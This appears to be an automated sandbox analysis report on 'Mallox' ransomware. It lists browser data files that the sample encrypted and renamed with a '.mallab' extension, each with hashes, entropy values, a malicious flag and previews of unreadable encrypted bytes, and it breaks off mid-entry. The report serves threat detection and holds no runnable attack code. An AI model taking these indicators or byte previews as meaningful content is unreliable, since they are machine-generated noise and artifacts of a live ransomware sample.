                    Preview:...w...a.m,......!.....1...@T+E-:dG..U..j4.4....p$.k.[~1.f.fh&S...$...3.`..w...r.i. .S-c.i.-.......v.F....'.=p.c.L[.....4io...:Z...?._.W...&.$}..:.n...31W-hT..l.F.^?.j...Q,..$v..dd5.u.0o...1...3<..6c.^.Mi...xI..L..x{u....!..K..SmM>l.n.../..|.aA...f.i...U....S.U.. Ke(.7{...B...V..B............;...)i..~.Z.x...LC{.....0.W.:8......Bx#l.^.JB.)....m.?......t....V..1..jR..|.z....U.*...P...3...=o.8......_...jW..._......VQI.....vj*..2.Bl..."...X..7>....../..M..W.PC>...'.y:j.H1.:cH..82+~.["4#..$............>...x.7%..os,d..(7.Z.n./..:.......2.....D?...V.....=p.......?...iN.[...FTV.|.Y.'P...<.R..4.z....SVh..Z......t8....6Y.N..x.45..L........F.k5.+.:.(...8(.6..\..4L3..A..d5...|.Hx.;.....L..O:P7.'LP..L.E.C7B7.o.a.)...3S..GqgdV.....;.&v...4....!...Z;...<ZId..0.........`V..u.......u.`..q......n...wW.2%y.9.H=l`...>.z..8..<o.+`..HNW..&dq...6JLwy..:0|.K..>0F,#m....].Lj..`@.!.......T..+...#k.hPw...52y..A...f./.....vS...ZGNj_.R..<.!S...;V..o...CV....i.I.

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\wallet.bundle.js.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):2936880
                    Entropy (8bit):7.99993148825423
                    Encrypted:true
                    SSDEEP:49152:Gcu376nXtK5+W78AGn7Hk+ylCSitrft7vQ973Oh7DANReZfbpQZe0:Gcpn8SD8lC1t7tLce5D9ZTpT0
                    MD5:3BCCC6A7C80FEF6EF170DBF5B47A8225
                    SHA1:1741DB33461664ED799BF9E534498498C48D751C
                    SHA-256:A74C4F6102C35019B32DD3CDDDD0E930A8C9B2346668F4A1D32AA031507F547D
                    SHA-512:23AB7B299099956F8202FCA7BEA9C8A78CB19EFFD3F84F050EB079F4128E15D7FF1290119410A18E9C026736ED73A8E3E2C32EEF928618271CA498C800D2DAD0
                    Malicious:true
                    Preview:g.........FM.....E=7z.y.O..1..;...e.y.7....I..35;.f....w.Q2;..-yR3.\.........5J......E.\..j.:..9A<.(_....{....Z..4....W........1. .er.....#V..u....o.S...0y'...DzZ...HAa@.`Q..X.....zh7?...e.~v...A.e...3..._.0..+>..1..].tK.c..'.b..l.6.NW.[m9..6'.v..u.............Rkw6.......x...P..a.+..}.......@.G..X..e@.2.qRx...G;...x..p,.a..}.1...._.......O..*..ZU-....e.>F...!B....s,....l..^.z.O..O{.J..}^.D!.'....."......f.d?)..J..q..lZ..&......k.B._.......`..Js.d.-.)Io...7h...q...".......6..9...R.T."....[......#{x)y%.....Ld......rx.$.X-..............h.......Fs.+R...,.D..D&.`T.^....?5....d.\...B.S3.[!...r.^....-6"A.#.I..I...-+.........I..}U.p[o...G.:...~%f..o......|.H+..L<1O\S.........lB|06.7.IXy../..l#....m.P.=............E....C.R!{@...7..>.....P7..a.{@..V(.$.T..Y..gd.b= ...Q-.b;.3.D.......'L.X....=+..Y.g....V[?...i.e..d%(W..4.$...xq/.W.B~p.9...."{..|1*..b.H.j....t).C.L..c..N.A.K.).W...r].......j.;m#.... z.N......i....B .~w&Hu.....k.*.Hi.X.J

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\GrShaderCache\data_1.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):270444
                    Entropy (8bit):7.999410951815283
                    Encrypted:true
                    SSDEEP:6144:syboEXAsFmguDqUi2/LPHUiNX6mSz80v5TkAHuU89:Db3tFSmU1/T0W6Bz80va1
                    MD5:A112DA611A3F8D84FE28C2C48B32A50D
                    SHA1:A9B3484D98B5A54D671B611DD8DA602233B321FD
                    SHA-256:97B431C762C34CCD96E3EE360F5E515F86FED41EDF4F66CCCEEBD8B7BCEE8B9A
                    SHA-512:9D99F191DD27AEFA0E972B4B4B258BEBBBFCEA822A0648F013CC02D37794F0455CDAA6562802A293C152E00F01A8A8DBE972A662973618EFC711852EAA7A5E6E
                    Malicious:true
                    Preview:.u.Wo..gAgZ..c@...~.r..%=...f.1...l..#;.fD...z.B1"K..!R/.g....+}d7./.8a.gY..].,....m.9...........J.B{.Q...f=dU.h.........^.YYW.UG.r.8%@.A.0.H..j....Xb..^..IN..ep.......^....i|....y......Z:.'h...B{......@o.V.!..%.....!>.N....G !.(7pq...[C......x..e...b:...L........b.6']t....e.U...r..6...l..........`..$ .$...[...uy=..U.5A...fJ.r.......y...0.,;.A....P|.....5Ql..:.3.3..n.X..r....6...]"u..A.!....G.A......`..y.....G....l...."G.{....:...qHS5\.?...D.A.K......bo...k.I.b.Mk..&....F......p{.b0....+...=....A.n.m.D|...<....u_.......PQ.}o.-0.1hQ0.....S=M.QU...R.ar.<..Zq..6. ...(=... bP...*H.....C......G.*"...."7.).8}..F.6...*y.u...JQ6.f.w........~`O.&....XyH>...T...1...g.../;z...F.jQ.P...z.I.a.`....G..si=.H...|.....&,8.h..9?>s..p...>B.....-..OJ..C...J..Ws.}..\.'|`...r..(.0.$l*....z.....4[........p........=.@..c.,f@JN.+/.........Y .......Ep<3qV.I1....t....}.Q...K...$...>E{. 9....N.......A.%.6.@@.z...E./.....-.>T...e..V.j................)^.

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\GrShaderCache\index.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):262620
                    Entropy (8bit):7.9993132239806
                    Encrypted:true
                    SSDEEP:6144:Hq6KAT166YZYjX+Qn25Iy88bZntVLTbDh2rgQ/:ec1BiYT+D5Iyp9ntVL2
                    MD5:D371E76EE6094CCFA4343C3E24269F2C
                    SHA1:E47DA9EBE1314B22DEC7455AD48E200C4ADA1865
                    SHA-256:DA6035EF5B42EB6A29DA76B7ECEF37C79076C2DE6D050F80A87051E400CC7D79
                    SHA-512:ADDCEAA6EDEBE760C2BEA41FAA3E3AABFD4308668E0E95BF2C9F5DCAEFCBFF68ECE933E5FD61BDB1679F4520BEFBBAA20CCD5538FEB0E29D11EC604AC302C5BC
                    Malicious:true
                    Preview:?.{.......}...n].....3.,N.$.cH".{s0...:n....k;..K.gU;...U?.e...{.gq%....I.`..P.y.*...T>X5.(.].D@.1....&.}..FF.+a.!.).....&...ZAW....X+.M...).T...q..S.3E./|....W0.kC._.N..............D.#gt..\...s..o..0.E-.[....)........I.5.....JMu'&.d.6.i....qk.4.x...,hQ.0........7..i}Sx.[..3..C..?.m.g.S.... 0.1..m.V..i.....P..........V.2....RS..]A*g8..a|..G1.S.....OL...-a6x.b......&G@..C.)!X.']..\^.J..{(...@...}......C....z.H.nC.f...1......v...,..7G.9........y...$..Y....L yB..Y.......vx.....b....{.I....d.j..Z......i...o.%7..."......=.(..*.N.X...?=..&...7D'/.;|.Q.u..w..|y...{2K.C.x^g<]_...[).......@.b.....//..."g,%.Sw.\..q.......ax.......h..........4...k.}.O..u..j.w...z.ax.U.F.2:.=KfLg.......3H.......2..y~.......B.Q.%..U.Lz.."vy.Gj....P.,.)7..6D......S:...J.C....Z..\....Y...y.)..SP:k=..)+.@..R......R.Bz.0g....O.....I..,.M..a..(Y.P..N_...%?...`......YC.P..-.....r..X...-..^E..Wog..../.|@..b...i..R....3=...Ka..=.....UIs3.^0..."R*.IV..(<.).).I>.n?...H...m..

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\GraphiteDawnCache\data_1.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):270444
                    Entropy (8bit):7.9993179445275375
                    Encrypted:true
                    SSDEEP:6144:SK9XPQkX0t9eVkhKNrMlWxHE5DnGvmeqovCNxbRK8:Syo40lhKPGDnGvTVvCnbRt
                    MD5:C8BA10905C66943A4A39054ECB442656
                    SHA1:0C4FF7194F731C5AE874CA34B8672719639F721D
                    SHA-256:C44D51AB11C69EBF1BBF53672EF2A5D10DD9F56C97F9D6B49F591AA7C226611D
                    SHA-512:BBA1B066402EC8357308EB48533AFB6E09366C3F5F55771C6951406B262929B4C81D207269E66E00B40624D901EDF963D5E4A1CAF517BE466BECE5D72BCDDEAA
                    Malicious:true
                    Preview:D..g......(.+.z5..(..b1*@.....=.....#*......$....t..S.ae..a.l...*...C..O.....#.I8.g_.....b{.j-..:....K(@.X.....'h...p.?.C{#..`2OCO..b."./i0..30.`x..O..........m.GC....c\...z....G..\.h:..g.s.4..sr.m...c.!A...sG>.w;DG'A.V..ef*F..`}DM.,.8..6...-.0.S...c...;...#..R..&C9. e...CG..<.i.]..6..3.j~./..t./0..F.t.tK.s.~n-D.....K....C_.PK3..En...wl.T.....!.kn.H>b..:..W$........R...y....U'.....G.....g:\.........`...f....p.i=..T/.....o.[AK..N....)...{.giE......NbMk.ky.........u .Ia`}9..&.s......DJ..g.......K.!..t..(..........Q...=+...uvy....D.._...o%.....6L..*..:|..Xd%..5.....9k~>2..?74Q..z<0........}.......:[.R3.........[.qGK..m.....d.......R.q...YFsI.8....J..<.........m..w...PN...SDZG...A..j.;.'.....l..[.J!..*.o...i....E..P.'e......p. .`D.XG`...`.h.....@.|.$..JP.t....F=.}N.B.].&..._H.B8...TQ=C.Z...... .F./..5..#C.4K...........V<..;TU..[..>..ub...co@.6.Vw....X&.|.].u#.T..y..,...:..GZq}...ik..a..A..?..g. .".C\....r..y.%9......U.WG..L.....Sj

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\GraphiteDawnCache\index.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):262620
                    Entropy (8bit):7.999339576101085
                    Encrypted:true
                    SSDEEP:6144:tGaI43YFlcqnlDwiMIrA/c3Oshp6W3VC40C5Gsjpll0o:tGctqlDw+3Lh0W31Nhp8o
                    MD5:FD9CDC318F2F4B13AD434409F257FE34
                    SHA1:4E1E06E001C846BE5303099F994A62B1ABD44F1D
                    SHA-256:B07C801E3550E3773B7748D452D1E421636D0118DEA1874597B38CC713F20629
                    SHA-512:8E776783877FA398DAA8B7AFA19ABBC14292EB851C0F619BF354812017D5964A9DF24C921A96077735B6821CC702B90BDD3EA8A598507B37D8E0021DBB0E1770
                    Malicious:true
                    Preview:...e!..2:}...G.u._...B...RHL.{...AJ..FM7....c........vw.f..y.R.S.p....[.$.q.....}..lJ...D...e...|l........gq..An......i.C..`...25.w../.......|Zf...HW..).Jn.x.R..T.....<.:"z....)..[..~.o-.Us....al.aGu....,.4..%.........}..5.....+.0z.e...:].......y.cP'..Xh\*...b...+..M6..T.0....>....i@-].2....FS.5.....Z..O.<...Y.......j........F8E.6...1-I%z..I.K....v...:^y.....?..AzjSoJ.r.uR....:@..}3.`&....`Z.t8....|Qd9.9..e..l.u..2Xx.l.K..2/..I.0..vB?...Pr...HIR.\.2......:......a..,U6.v.XD{..*V..R.....V..HJ.b..n....rfw.....<.?.l.w..U.<qzjG.C..J........n.".".A.qzF.s.2V.1..{F.%9`.b..:...oB.r.H.....jl..m...R.....2...~..DV...p.@.Lx.../vm..K.....:t$.y..B<u.P.E.U.\.Q...l..#(.....uq./....i.Iuz....g.......X..^g^9...7.....Y:^..9X.4.<&>..E,...g+.+...r.....i.C.>..I..w...t.3..O........!sL.!y.v]./...Pc .@.Au...G.qn............m......](.`.?.2.w95....c..a. P..m.-...!.G.}U...\tbE..\..x.).x.|..........~.m.:..T.o.......T<..3.!.b...!...{M.6..s....).f...@....L.i.j........u.r..

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Local State.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):44086
                    Entropy (8bit):7.995748432873624
                    Encrypted:true
                    SSDEEP:768:gfnxe5blG9pJq3noNV41GnUGeRL/52L9f+AiwUPjyKla2NT5rVf61qBD7:SnebGPqinWA9f+AjUPjJaKFrVfeqBX
                    MD5:85634850614B3F0F2644939116BE73BF
                    SHA1:1F3AF735916889360678CF6CF6FC0F7AA06E515B
                    SHA-256:33EE1F69EB51BF76F2D056F8DCD75B7B6FB907C18AD072F0D19FB3A1EB4B48AC
                    SHA-512:9F1D3E12B21C46661D65207D42F6C44E39C9F3D7895916D46C85DB5654F268AD9291BB2A8B3B664AFD11B87A922D9885CCCCFBA1FF7E9749809E0AC50EE0EA2B
                    Malicious:true
                    Preview:)...A.-....T..)...5>....b|.3....g.)A..R.2.:5f.7..cZ|DxO....s...1..8x.d."....S\t..I..E./T...+.>*{S3.......+........5.W.6.S..W.8OF.....(....1eC'C...J.~......|S..h.j.."Iw.....i.#.....s.U.`"..o.?......A.|!...v....I.....c.....V....4.V......r..G....<..<B.l6...Ww..h.-...:.Z....f.H..O/....2:S.DL.J..k.}..48B...1.U../......d=...j.WRux."c.F..Y_F.S2.......s?.C?.+..g.].s.....%.<...^.j...g.......iW......$../.../.3..u.[.FJ%g.R....z....W{.4.%H2..,.m.....[>...8,.3(.........\(....L.Hb...)3AG..b.e-../..... *J..>..U..A.s.D'..c.).Q.N.V.!....x.:..j."c.do7......(....bk-z. h.a.O!..>...>.\...k/0.T.b.K.e....<.`.....\k&<r.T........d.~X..P.B.....x.........7.d...*......].C(.:l(....Vt.............&....x...Uo!.~...{....B*.1...*......j...g...wO.Y.c0...Kd`.x6..*......."n...|.Z.~...v.....s......d....|...%..9....-..q.s...kO'...n....]R...x..kK.E....N.e...j......Bj.....Iy...O.<...S.....MFk`......\.......ku7H..N.........Y...4A..@^.....W*A.7z.u..5....O..nX8X(..... ....&.a.D......J..

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Nurturing\campaign_history.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):20588
                    Entropy (8bit):7.991940022230603
                    Encrypted:true
                    SSDEEP:384:y6MBRASKX0SljZlAP1tYtKw5TV1v68zI1ZA4R/EwJcVB2sGL:jgAnESljn2OK2h1vfT49EwJFsGL
                    MD5:0F79D6478909349564A03D213751A07B
                    SHA1:AF5C03C57A9D79657F0F70138D1767746441776C
                    SHA-256:6C98EB1995DB287F5F893771C91DD3A169CE6DEBEDC0BE20623CECF5306FA56F
                    SHA-512:923AC6EB77F30D5473CBD0B7C18FD8C0B669B1AE44E812B4A6160FFF145BD2F6ACB6B18A5328AD1B2B218DFC6C8D4E21BB503305B7D704C46FA0F654621CDCD5
                    Malicious:true
                    Preview:.XO.v.sC....................h....Me.Y.{...r.Z..*\). .W.....A.Zp........YcW............6..Q(......r..l./r..20.i|.........*:..K...G~.<-.zR]d(..0m|...Nrh..c..$j.7....Z.B....{....Zz.-.2Ac.w..v....L...*..........=;m..7X.<...Y...7..8cR.=B..cC6Wyh......'^lD.s} .j.Y^....b...l..0r.C.'p..k.*..f...........+..'.Sc..........:.C..Z.|.5_.k..0QbQ........K.1F..+..q..p.....r.6.....j*nb..4.p.g..!...(..\..k....6..p`g.....'|.6..h-..-B..K.i|j..,M9..s%..,.$...y.s 3.............J.. .b......~...._#\q.+JV&.pR........K43._r/*..q....USG-..ibVLyE.gt...*G]..G;.:..23..-P%.O.4k$....L.Z|....S.'{...1].H..z...X.....a...X.`.g.....V.....u..CrLj.\.B.......].PzA.@.I....[Z....I.......p.+..2.O..%.f.x.'9...?./[.....r.>[.n.y.R.?.....K.^A....|........+.A......2......T1..s.iI...&u.r.W/Q.T..4.....8dEHu.r.s.{..Q.j..x."CK..>v7.}.&O.hc.8..\..].P.'....;&..2$=..^....{...@l5...f...).%Vg.t...G.s..<.......F.D.}D.u.....".O.....Vb..T....l7.5.#.9.iD...).N.....^3A..0`.F.k........i.-.

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\PKIMetadata\7.0.0.0\crs.pb.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):275070
                    Entropy (8bit):7.9993405793011165
                    Encrypted:true
                    SSDEEP:6144:ZxE5pscyawBtRhmy6a/kctkLFQk37UdFpTxtvK:ZxE56yytRhnVteQk37UdFptNK
                    MD5:A95D96B82FCC05C146319A7D1E3E01A6
                    SHA1:C89C226AEF14CA5A4A8742E247C350E4ADCB75D0
                    SHA-256:04D4BC2BF409210809478CD9ABD5B9B821D482A87F1496A27B7F81562E1C061C
                    SHA-512:DAD1D97FCCD99DB58A89B77B3681A4D1E9012880A43CB96E57123F7165B724CE5B97AD549DAFC584213100E5E207CF0A894E9B59CFE458CDAD76D426B91FE189
                    Malicious:true
                    Preview:.....!50..q?....nA.=qEI.+.Ax...Aqdf..e...........S..-....W..q.F........>...l.0.X.../MZ..ke....&F....k....U^...f,bu.N..1C0..N..<.....|..cy....nX.......=i1.l..Qz.XTA1..5.X....rc....1VA..<.[....;...Y9(.-....M#.>)..@..C...0.......'hA2..I.....w......G.....&.3....g-.../3.?t.I{...."!.>.....K..NP|"...........!..=..VM..Y.~.A.6.....M..^.r.......,..k...?.A.....x..)<..}....1.......O.{.hR.9Ax....V..C....|..8....O......%r.(.%...kX...\KiG_..h.&...0k.......?..m.......qkw..S....!...\.^Z.P9A.5..-..{.&..4..@./...'(..9..2{c...,....<."p.;5..c`....)Yt....'....0..q.t......_./.R...x...li. (.!..U..Vfl.(....@....q...W.y..e5{..I...j.....&y>..<.&<.,y...k....._t..vt......!.!...|o.......=.Tn...f.........Ol....;.n.;991F..'..J.@.G.s.d?gg.*.voL.[n:`....H*.U...3bE..j..D......K> '...X..u..@._....l...9..tPe....|]....(o.....' !..G.(......5.B...o..uR...x7"L....r=~s.e....2w.lb9.M.].I.*.a.......T.7&..g..<=z.+%N".......FY$~.1...>x..a.J.|.......M$d..x.tmJ.v.y.)

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Safe Browsing\ChromeExtMalware.store.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):2090621
                    Entropy (8bit):7.999909397253525
                    Encrypted:true
                    SSDEEP:49152:UkfNieVdQ120HJu7njgZ7B7PfPqBvWehbbbZCmvvBZJIag:UGYE/gZ1j6BvW6fbZfvFI1
                    MD5:1663DFCA4A1AFF328F1C6A4F7ADC002C
                    SHA1:4DC61DC590549D14EB10F0193A9256B8BDAD4E62
                    SHA-256:1AEC81FD3D1342D68AB3A68AD8992BBD569C431535B98EFF7A1EDC2E100E7F98
                    SHA-512:8762B9B082DA3712A0CC9CC50622B9E7F681289E6AE9E50D3A25EE5C869763DF0ADDB732779E5E92ADB86432BAB98C034FD1FCB60AEF714B2BC5B7A134D3451C
                    Malicious:true
                    Preview:...s.q-...}.%.....N..P8.q........u7O....3.........L.s......,-.W.+..............R..v~uR.Qz..O.5.Y./.`.@.\0.,..{z.1<!..1.....ML.....;.1.^R...!......32..4.uz.}.sk(*.>...M..P....9UT...T..K....5.v..%VqUq.....#Y.....8...e!r...7`.Eq.K.... {.y.#..a..e..z.]....d...v.......@2x.,..v ......P...w..nz{......./...(.S1Me.WUi.q.L..$...B.o&.......u\..M3,F.u..,.E.}.i"?WG-0.T..4.$]..a.+. ..}.......91..e...MS...&...E...u."..g-@.G<.C..v.D..(4...!....=...]......a....3..y.#..V3`....._.....q...>o*..<..o.#..I..H.$..?{....*.8.....*...a.$U&m.|.....C....>..)......+...2.7..}`.6.[`.0..Gi..s.K..A..+h...&...~;z.....k8....,.j..)...Lr;..h.+.N..3..6..,.q....2...:....a.eQD).-W.......V.....|> x.z..J8.M..-PfC...X...5C.>.Gv...8O..%.....$'F'.u..~r.V...=...%Mc.h:l...~......x.b...;....L.1O..sn"&..j.......m......o.d..\.f{..`<..q.._.........~F2.4.....0..:;q.y.@s.E~.kZ.M..T^O.V.E....&.. ..V.Pa..M.,..?..7.u...r..\Q.z.;.f....o.uF.31.....G..I....W..2Z2.......+.W..gvq.....B

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\SafetyTips\2983\safety_tips.pb.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):128557
                    Entropy (8bit):7.998485292792531
                    Encrypted:true
                    SSDEEP:3072:0mVFdAXnwQ+kLncXCC9RDwX+lz3JtXOv0nUzRj6d6GoCKR0D/Iwj:nLAXnPcCC91wXIvOv0wRxCKR0D/Hj
                    MD5:90DC165B5734A5D04F9AF848D05F8C6A
                    SHA1:B48418A8114AA2C0FED88D8954ED362677606FB1
                    SHA-256:5D513CB49204970EA2ECCAA07867BD816000EDD31473A32E6771A55F2CDDBB7C
                    SHA-512:3E0976ECB607C086A69CA41FE00F5EE29C222FD76A5DC40136FBB46A528BE3764A6F644A229D9F5D15F503E7B1433175036BE9ED3A80BF019B409609EF940597
                    Malicious:true
                    Preview:...<.O.J.A..........c.....w...Ahz...L,.j...F..k..>\./1....q.g..a..g.0.@h..!}.^..u.w>2.|E..*.H.....",..f.^}uM.t.p..TW......dW..}FX.W....^....AL.....S,.md....-..@...}9...5....BV.....LU....$.T. ..~...$L'.Fy..e....H[&.b0b....y....@s......d.2aF......I{.K..y....>3...B~vc...8.. tz.M.....l.O.....j........D.F.....Y.Q........i.d(.h.q.I..o")oE.~..l.....P]~D0....!p..ab.T....eTD......Z.J...C.....^A......O.#.HR._...........u...K...9.....!L...!.v].3.......||.I..-.!..[.&..V.F...@m..K.8..5..50.9.-.....8............]..P....A...`......G..V~W..5B..ACj.x.[ZH.#5...O...r...3.Ta....K........4..!.Z.}%/.ue1...I3-.. ..U.'SW.A-.z.].c.x.q........Y.Zr.dX.W...lN..{.}......Y.....P~=...,?...w.WME..f\...)..M.~:.....:.4......sv.a.c.hS..c..vr..J......s.n.doTp..S>.. ;5..l...U~.W..).A.7..Y..f(...bF.7Q...:>.h...|s.i`.1..o.<...n.......^....bkMdU..*w.).EO.R....q.xj.%%...)5..%.rq...>.n....P!m...O...>.a...{..uK.5ia.-......h........G.....r..x.0.i.(T.oP...".l.,T.....\....7

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\ShaderCache\data_1.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):270444
                    Entropy (8bit):7.999269611896296
                    Encrypted:true
                    SSDEEP:6144:zpqOm7ZqGNFh0AYdEp+etQ83EsAXqwA4PvsA:o/ZEmoey8rAftPvv
                    MD5:58E7EF1581917AFBAA716A8BA640A598
                    SHA1:EC5FB203D3B5637E7394C4DC53E8F6ED38ECEA4A
                    SHA-256:E868F56EF451EC5D94639A1FDA92183B86648E6B2A67A84A6D875D558752E65D
                    SHA-512:50DBA9009BA981DCA0553271894E551042E37F5E7F3CF5507E18C5B08813C90C893FD549C62CE7A6581199E908AC3BA2FFE381ADD6DFC8821057B2AEE508BD8A
                    Malicious:true
                    Preview:rs..z.9......Q...#..,A....8..e@......6.(.....c.g..VA1.9...Sb.Q ......V!.G...........A..J.4..F!a..d.fa...g../..J!et..loAO.p.ym,.....SQh.02....'..>.......Gj....}:..\...}Jra.<.S=C>.....T.i....?.M.a.n.......m...t.?6.B.....K..g%...=.,(b.....0(.J./7.A......L.V.<au....y.t%.x0...=+...$ue..^....R.3*.~/.......O....v...y....ETG.mwk.u.u..E..a.^ -FQ.......;fF...Z.XL...c... 3oX.....@.G.~.q.....'.e2..|..%.uJ..2s..G..M+zC.......2......y.l4l20G.p.Bq5..../....._..._.IT..<k....a...+...EEj.[...%7(W>.G.Z..!.|=.....T.....fy...#.?QG..0......r.U....d......3s 6.!.q..................a..#.K......,d...#..mL.%~...L:^.....4.K.@...R.ihw....6.Wc..p..*..k".Q.a.2.....p.....3.YI:..#e..l...E...i0...4.@./.....$...j:.Y.....,.....F...6..m2_.V.2..E?J.Y2...... .k^.h...+........E.P.t..Z...K.._..NP.%F..$...\..%."../3....Q.D*D..&z...v..=../..xo.!.....b...w..A<j.."..8......2.7....Q+.k../../:=..!.v)..~c..u.w...9....\"6>z...6......w......p....hc..B<......p#.).. ...l..)z..I6&

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\ShaderCache\index.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):262620
                    Entropy (8bit):7.999349211784392
                    Encrypted:true
                    SSDEEP:6144:0KYstGPLmSH1RUtkxo1NFxsoBwVovsTaXSce+PJhc+Uoq2f0tG:rtILmSH1RUuoN7EaXve+PJa+Rq2f0tG
                    MD5:2BA4341857C81FD53B89585E4E0ABC01
                    SHA1:EB13DEE2B9D5DE834CF7C534B15EF654BE5C4BFE
                    SHA-256:5C94EFC5C3DDC5C2522BCF44C18BFA9D61218C63BC1BE453A1A11BF344642BDD
                    SHA-512:CE7D04785E4E895E94A3C4FA983CFC2C3C07968BA5B9E8D739E36741D7E4A94E61881810127752E87CA607AEDFF75A1E3D51C3B4A3C8C940042F1AEED72A09BE
                    Malicious:true
                    Preview:...".d...i..m.26....8.K.i..z.:...I.fO...t7.W..U.F.o..'...}.T.a..4.........{F...h..f...o..j...!Aj...Q&.j..W...1....V..,]...0...Z...Gr}u.B.X[`.c..i[x..... .xNp....Y.Hy..t6~.......+./-.....74..|U..BC.k.E3.Zt....../..7Jo..O.'....1G.r,..2........K..I.!.................<....7ji....A.+~...1...................Zy1...7*.\.......W1.}-..d@.....j\......*._..a....~\.K..A-5.2x1...G ."|g..,..0...g.E..@...~.....U.....u...v.....?1.`...j.".Fd...u.......d.U..Ht.tQM...0+.Iy..n.*..+....$.xm......F{.M#.........&3..../!..&.....V^.b..{|2!...F..U(....J.U.?[..o. ...b.....9..o&.\.D.8y.,'%m_..t..`....,dT2)X.#=.)...m....}....vP...P..k...W.......{.y...P\Q.DM................uP..l.AT.D.#+y.xS..B./....%f...).r...zw4.+.E{9.N........OF.;..#t,.*...[.1.)x.7.}...o..bh..+.X...l.....15`.....u....9.g..N!S.[{g.U.Y.z../..........{^...W.)..p...uRJwk...ZKq....y.o .s.{..j.G...tl..%F....V.....c...G..$..]nk-B\.D......?[8.[...E..Z..d).RWx..)Sg.r...O...Wx 3...,..BRc....r......}g../

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSynchronousLookupUris_0.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):35410
                    Entropy (8bit):7.994858561124373
                    Encrypted:true
                    SSDEEP:768:XN/fQ1tfX2oXU6L73TKtP1pLvxYjtvKFIeRl4XmFoi:XN/fQ1tfGGU6L73OlUwAmqi
                    MD5:0975E237A27120FA20D10730BB4CCC6B
                    SHA1:C56180C85A004C6A14431092BA047ECA492567F1
                    SHA-256:A76205A81E244813B6AEA0D0F1DA4EB317A20ED1545EB458E24090885E331559
                    SHA-512:85EB6AE1DFC3A2E88AFCC9D8185B426C7DE79539029F01E04E381B782FFD0CE538A94B4FD9E5FD6AED58F8B9B1C2C3BDA171A11B4753D0316F186D56149EA3E0
                    Malicious:true
                    Preview:1...#+..e.".Q.-|....|.p.ZzK..;[.4..`.E.].....0..r...7....T{.Tk.7h.N..........H..I.}......=..-.w.HB..I.gi..Dc.N......M{...[...6...'.z....K.M.....sr..Q...!.i.......h...(6.....C...I.P.....\X.....A#.NwUJ.)...B. .#l...T(.=..E.."...r_..........."1,....a..^b9`.j...e....n.y..C~.....\T.G.k..."...L.)h...AfO.oS!...z.#4.U....3....!C.?..*r..z.K..^.#1<..q...B6..,Gygm.]....".H....HS.MO..K.p.$.....{ g.8Hj?.:....J..R..:.9..x=._.x..x..`..w.@.T...0..].0.f.|.M...j.^...Y.F.q.....U......Ao...=........c.krt......."...L.s.J.T..=.lbM....Jn:3D.3...CN.w..r...c...k.95..t...m.._....".Z.B..l.0.1....%.&..\{&.p{C.J..}....u....'.9I...k..bTp..W......@=.....X../-..6|yF|.K...Y..g.u...;'3...V......0..y..d.n.dnT...}.&...n.*5O...LG.\.....-.+@....K_......../......ob.;.!..w.f..S....|1x..f....H.G..bs.D~......".H.lTU.....aU..^5.S..w:}.Q.=...<].w.!xv!.5..g/.....n.=..4......RFx...G.Sv.z....V...5B.0J..J.k.5w!w:......9..%._...m.....9j7.....q..c...+v5.=.j. _XG]......UAQ.U..d=4)...O.|...:.^.

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\SmartScreen\RemoteData\synchronousLookupUris_636976985063396749.rel.v2.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):35410
                    Entropy (8bit):7.993773687519665
                    Encrypted:true
                    SSDEEP:768:wVq9BHpMGZ0udmLYX/cY8043/AJlQe/12r8GtQWDrrGYmAl:wVKFDmLYvcY804oiqFIQmqNAl
                    MD5:D462E93B0E92A64A7BCBCAC67A38D091
                    SHA1:5FD53DF4D95FA450E1C52D4AD1CD1AB13503FF5B
                    SHA-256:6A743A2831B88F0C399D4E4A01B68A3FF3B7CC5393E24F6D3288441A111E9F12
